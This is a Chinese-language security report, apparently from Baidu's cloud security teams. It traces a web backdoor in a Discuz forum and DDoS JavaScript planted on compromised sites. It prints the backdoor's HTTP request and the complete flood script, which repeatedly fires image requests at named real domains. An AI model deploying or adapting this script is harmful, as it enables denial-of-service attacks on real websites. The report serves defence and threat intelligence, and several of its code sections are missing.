Author: 百度云安全天網團隊 百度安全攻防實驗室 百度云安全云端防護團隊
11月13日,百度云安全天網系統,通過數十TB的日志挖掘,發現了安全寶某重點客戶網站上的異常行為。之后我們的分析人員跟進,發現這是一起針對安全寶某重點客戶的持續攻擊。最終在客戶系統上放置了Web后門。
該Web后門的通信如下:
POST /uc_server/data/logs/20140708.php?v=1a HTTP/1.1
Host: bbs.xxxxx.com
Referer: http://bbs.xxxxx.com/uc_server/data/logs/20140708.php?v=1a
User-Agent: Sogou
Content-Length: 60
從通信流量上看,并未觸發任何報警。同時,客戶的日志里也并未保存http response的數據。
天網系統中的諦聽模塊通過對網站的訪問行為進行建模,通過每個被防護的網站日志訓練出這個網站特有的訪問模型。包括網站參數的模型,網站訪問路徑的模型,網站訪問session的模型。黑客這次的訪問行為觸發了網站訪問路徑模型的異常。該模型中通過每個路徑訪問的頻度廣度和路徑之間的訪問關系等feature,訓練出針對每個網站特定的路徑視圖。
我們在系統中對該客戶的所有歷史日志進行了回溯,發現該黑客在9月24日就已經對該客戶展開了嘗試性的攻擊。
通過進一步的分析,我們發現,該攻擊者修改了Discuz系統的class_core.php。在該class_core.php中添加的代碼如下:
從該代碼中,我們可以做出以下結論:
我們從CC的攻擊代碼中提取了以下特征fuwuqibeiheikeruqin,在現有的網頁情報庫中搜索,發現以下的鏈接地址:
判斷eoeandroid也被這樣攻擊過。
11月20日,http://file.lbgoo.com/file_120/37/ver.php請求被重定向到http://www.eoeandroid.com/forum.php?,11月20日發現eoeandroid已經503了。該攻擊手法被進一步確認。
我們又對該代碼中提及到的php100.com
,www.dm123.cn
和12edu.com
進行訪問。發現如下:
以dm123.cn為例:
顯然該網站被利用來做CC攻擊。
同時我們針對以上網站掛CC攻擊的js進行了分析,發現有三種:
以上三種方式,從掃描器檢測的角度來看,復雜度逐漸增大。第一種情況下,是直接檢測本域下的js。第二種則需要檢測外鏈js,檢測量大大增大了。而第三種則是在已有的js里面沒有攻擊代碼。攻擊的代碼是通過api接口動態獲得的。
攻擊用的js代碼如下:
#!js
function imgflyygffgdsddfgd() {
var TARGET = 'www.hanyouwang.com'
var URI = '/index.php?wangzhanbeihei&fuwuqibeiheikeruqin&qinggenghuanfuwuqi&chongzhuangwangzhan&'
var pic = new Image()
var rand = Math.floor(Math.random() * 1000)
pic.src = 'http://'+TARGET+URI+rand+'=val'
}
setInterval(imgflyygffgdsddfgd, 0.1)
function imgflyygffhghddfgd() {
var TARGET = 'www.weshequ.com'
var URI = '/Search/v-wangzhanbeihei&fuwuqibeiheikeruqin&qinggenghuanfuwuqi&chongzhuangwangzhan&'
var pic = new Image()
var rand = Math.floor(Math.random() * 1000)
pic.src = 'http://'+TARGET+URI+rand+'=val'
}
setInterval(imgflyygffhghddfgd, 0.1)
被攻擊域名包括重要政府網站和國家級新聞媒體
通過域名的相似度,我們在現有的網頁情報庫中發現了如下域名:
在163博客上可以看到,該團隊名 ddos Js團隊,QQ 1551227222
在網頁情報庫中查找該QQ,可以發現http://www.mspycn.com/about.html
看來除了賣ddos的服務,還在賣手機監聽軟件的服務
對該域名的whois進行查詢,如下:
從我們發現該攻擊到發稿前,該黑客做了如下的事情:
我們有理由相信,這是一個在不斷進化的地下黑客團體。通過更加隱蔽的手法進行CC攻擊掛馬。該問題的影響范圍目前我們還在進一步確認。歡迎業內同仁繼續跟進分析。
如果你想查看自己的網站是否受影響,有兩個步驟:
我們從該攻擊中提取了以下信息作為攻擊情報或者IOC:
http://file.lbgoo.com/file_120/37/ver.php